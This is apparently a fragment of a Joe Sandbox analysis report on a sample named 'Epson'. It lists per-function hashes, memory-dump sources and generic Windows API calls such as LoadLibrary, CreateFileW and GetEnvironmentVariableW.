                                                                                                                                                                                                                                      • API String ID: 1385522511-0
                                                                                                                                                                                                                                      • Opcode ID: 16ba91f13d4220adbed632b0b85cd5e813742f9768bb1c4d35f1c5548476bddd
                                                                                                                                                                                                                                      • Instruction ID: d62b21f91cec870c0801d3ab60c4998360a9282896e3f854e12e5a587979da97
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 16ba91f13d4220adbed632b0b85cd5e813742f9768bb1c4d35f1c5548476bddd
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D832C075E002059FCB20CF54C884BBABBB5FF49325F198059EE56AB351C738AD49EB90
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: LoadString
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2948472770-0
                                                                                                                                                                                                                                      • Opcode ID: 58ab015fd2101854f141fb82db9d1249d28ce07b3a59cce88aa0aaeeb866056a
                                                                                                                                                                                                                                      • Instruction ID: 3d8197ffeab81e951dd367a1a90fe1e14c303e3de2f9bad64be72ca0ffb9d9c1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 58ab015fd2101854f141fb82db9d1249d28ce07b3a59cce88aa0aaeeb866056a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 52D16C35E0420ADFCB14EF98C8819ADBBB6FF48320F14415AE915AB391EB35AD45DB90
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 509697d1fde31f37b915edcf22effcce9687fa97ebd8d58a7408ccc1a2262c7b
                                                                                                                                                                                                                                      • Instruction ID: 87b9a31d91ff504377568fa97862ffee3f008a95841b026689f12d72c80be754
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 509697d1fde31f37b915edcf22effcce9687fa97ebd8d58a7408ccc1a2262c7b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DB51D635E04104AFDB10DF68CC40BA97BA1EF85364F19C1AAE81C9B392D771ED46DB52
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CharLowerBuffW.USER32(?,?), ref: 00FBFCCE
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: BuffCharLower
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2358735015-0
                                                                                                                                                                                                                                      • Opcode ID: 6200881e0441d56bbedab1b2ead44e5c28b0c55813461f5577751a05a21d19e4
                                                                                                                                                                                                                                      • Instruction ID: cfc9509fbb9dec8f6ab81ce1557358984604fbdc83476a252aa74bae5b3e7e06
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6200881e0441d56bbedab1b2ead44e5c28b0c55813461f5577751a05a21d19e4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7E4195B6900209AFCB11DF69CC819EEB7B8EF58324B10853EE916D7251EB70DA49DB50
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00F5663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00F5668B,?,?,00F562FA,?,00000001,?,?,00000000), ref: 00F5664A
                                                                                                                                                                                                                                        • Part of subcall function 00F5663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00F5665C
                                                                                                                                                                                                                                        • Part of subcall function 00F5663E: FreeLibrary.KERNEL32(00000000,?,?,00F5668B,?,?,00F562FA,?,00000001,?,?,00000000), ref: 00F5666E
                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00F562FA,?,00000001,?,?,00000000), ref: 00F566AB
                                                                                                                                                                                                                                        • Part of subcall function 00F56607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00F95657,?,?,00F562FA,?,00000001,?,?,00000000), ref: 00F56610
                                                                                                                                                                                                                                        • Part of subcall function 00F56607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00F56622
                                                                                                                                                                                                                                        • Part of subcall function 00F56607: FreeLibrary.KERNEL32(00000000,?,?,00F95657,?,?,00F562FA,?,00000001,?,?,00000000), ref: 00F56635
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Library$Load$AddressFreeProc
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2632591731-0
                                                                                                                                                                                                                                      • Opcode ID: 0a655f90a99255dc99ff46309921a40a67e5017953ad418bbd06ad891461425b
                                                                                                                                                                                                                                      • Instruction ID: a468f552b85312a339724b5b1eb107c0e4827cfac739eeda7133459494ae5f8c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0a655f90a99255dc99ff46309921a40a67e5017953ad418bbd06ad891461425b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 10112B32600205AACF10AF24CC02BAD7BA19F40716F50442DFA62EF0C1DE79DE09F751
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: __wsopen_s
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3347428461-0
                                                                                                                                                                                                                                      • Opcode ID: c5c53604bf924304d9e099f1847840e6f8b25e495eed35a7c9130f85faf8672c
                                                                                                                                                                                                                                      • Instruction ID: 82e25ac4d6775bd8b89695968533b880f5b812dcd93b25d823b3bb4d7c027f56
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c5c53604bf924304d9e099f1847840e6f8b25e495eed35a7c9130f85faf8672c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B3115A7290410AAFCF15DF58E9419DE7BF4EF48350F104069F808AB301DA31EA12DB64
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
                                                                                                                                                                                                                                      • Instruction ID: 1859ba8a262e4a53ae8af4f72434dd0be7f50dd7fd0e0fda0a8ecd97c1ced0fb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 22F0F93350162067D6313A269C05BAA36688F46370F108767F629971D1EA78E802A793
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00FCF987
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: EnvironmentVariable
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1431749950-0
                                                                                                                                                                                                                                      • Opcode ID: ecbc04913c0cf754846424dcf7d12c2fd958b46290f5d8f5fc5b5d1133990955
                                                                                                                                                                                                                                      • Instruction ID: 78e155b8987aa3467cb25491f3938468a4e6e17fa13ad60b7ff468bbf75e1ebc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ecbc04913c0cf754846424dcf7d12c2fd958b46290f5d8f5fc5b5d1133990955
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4DF0A472600105BFCB01EBA5CC46E9FB7B8EF49720F004055F5099B261DE74ED45D761
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000,?,?,?,00F76A79,?,0000015D,?,?,?,?,00F785B0,000000FF,00000000,?,?), ref: 00F83BC5
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                                                                                      • Opcode ID: ede19c246959c2ef4a4cdc2071be0a1f295f9bd062b3562e88d4df6c6084f984
                                                                                                                                                                                                                                      • Instruction ID: b256b2ba2393b30f2c448f4f514d8277fb4f2802149ede8e31c5de8f43ab5985
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ede19c246959c2ef4a4cdc2071be0a1f295f9bd062b3562e88d4df6c6084f984
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C4E0E57160162066DA303672AC01BDA3648AF81FB0F144521EC08964B1DB74CE00B3A2
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: a86be1a72cc9ec4ebffd9332ce5adc3dd703da11a9dcbf687838d1371972d384
                                                                                                                                                                                                                                      • Instruction ID: d313470eef4326028d080c58ecb82136e12fc4bf32f6c7b49035d2bd75ff4369
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a86be1a72cc9ec4ebffd9332ce5adc3dd703da11a9dcbf687838d1371972d384
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 60F03072505741CFDB349F64E8A0816BBF4BF1432A354897EE6E6CB610C7359844EF50
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ClearVariant
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1473721057-0
                                                                                                                                                                                                                                      • Opcode ID: 8e5692f6f06ba8ff2982566050ef67a7c6e7726e05cd3824fa5fd66a2cb6d7f6
                                                                                                                                                                                                                                      • Instruction ID: e9e21d7a66263ff8bfe5645d4e202f920777ec719e671e6d8a44e1584b22bd88
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8e5692f6f06ba8ff2982566050ef67a7c6e7726e05cd3824fa5fd66a2cb6d7f6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BEF0E5B2B04204AAD7208B7498097A1F7E8BB11365F18851ED4D5C3181C7B65494BB62
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: __fread_nolock
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2638373210-0
                                                                                                                                                                                                                                      • Opcode ID: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                                                                                                                                                                                      • Instruction ID: 85409dafb410b3b47bebf98018b09971cca8094bc07f6942945a42d111c4ba24
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 16F0D47650020DFBDF05DF90C941E9E7B79FB18318F208489F9159A151C336EA21ABA2
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00F53963
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: IconNotifyShell_
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1144537725-0
                                                                                                                                                                                                                                      • Opcode ID: e43127d5d3784f088e922538a2a158145435217f23dea73eac35e3c5e881c5e9
                                                                                                                                                                                                                                      • Instruction ID: e10a830001b2c004d002ea1e7fa3efeb635ab73c7b45985658308c129eda00e7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e43127d5d3784f088e922538a2a158145435217f23dea73eac35e3c5e881c5e9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 84F0A7709003189FE772DF64DC457957BBCA701708F1040A5E68896185D7754788CF42
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00F53A76
                                                                                                                                                                                                                                        • Part of subcall function 00F58577: _wcslen.LIBCMT ref: 00F5858A
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: LongNamePath_wcslen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 541455249-0
                                                                                                                                                                                                                                      • Opcode ID: 923bb0027c3fb7c14988e49087370039c5b94c33a02dcae1acd3e8db330a9e19
                                                                                                                                                                                                                                      • Instruction ID: 4442a0f1432c33bb0ea4c4c3c9e2ebe5e0ce34a33295ab6b698dd2ad72d2fdb0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 923bb0027c3fb7c14988e49087370039c5b94c33a02dcae1acd3e8db330a9e19
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F8E0CD7290012457DB1093589C05FDA77DDDFC87E0F044071FD05D7254DD64DD84D590
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateFileW.KERNEL32(00000000,00000000,?,00F90A84,?,?,00000000,?,00F90A84,00000000,0000000C), ref: 00F90737
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                                                                                                      • Opcode ID: 05e304e2aa41afdb08b7a684b04ad276096e6f41ea3f1f0f5244bdb75dae3e9b
                                                                                                                                                                                                                                      • Instruction ID: 24375731038bc12daeca954b0d93773ae2fcfc5db22328956f5e2ef5fb001ed3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 05e304e2aa41afdb08b7a684b04ad276096e6f41ea3f1f0f5244bdb75dae3e9b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C6D06C3200014DBFDF028F84DD46EDA3BAAFB48714F014000BE1856020C736E821AB91
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(?,00FBD840), ref: 00FBEAB1
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                                                                      • Opcode ID: 8251b42218499ac3fd5386dfe954de7bdd1a86e743c919049139557ad2149f41
                                                                                                                                                                                                                                      • Instruction ID: 8050eba42503261060f991e951212bc330522f1bf646f6221b91aee1f7ec4439
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8251b42218499ac3fd5386dfe954de7bdd1a86e743c919049139557ad2149f41
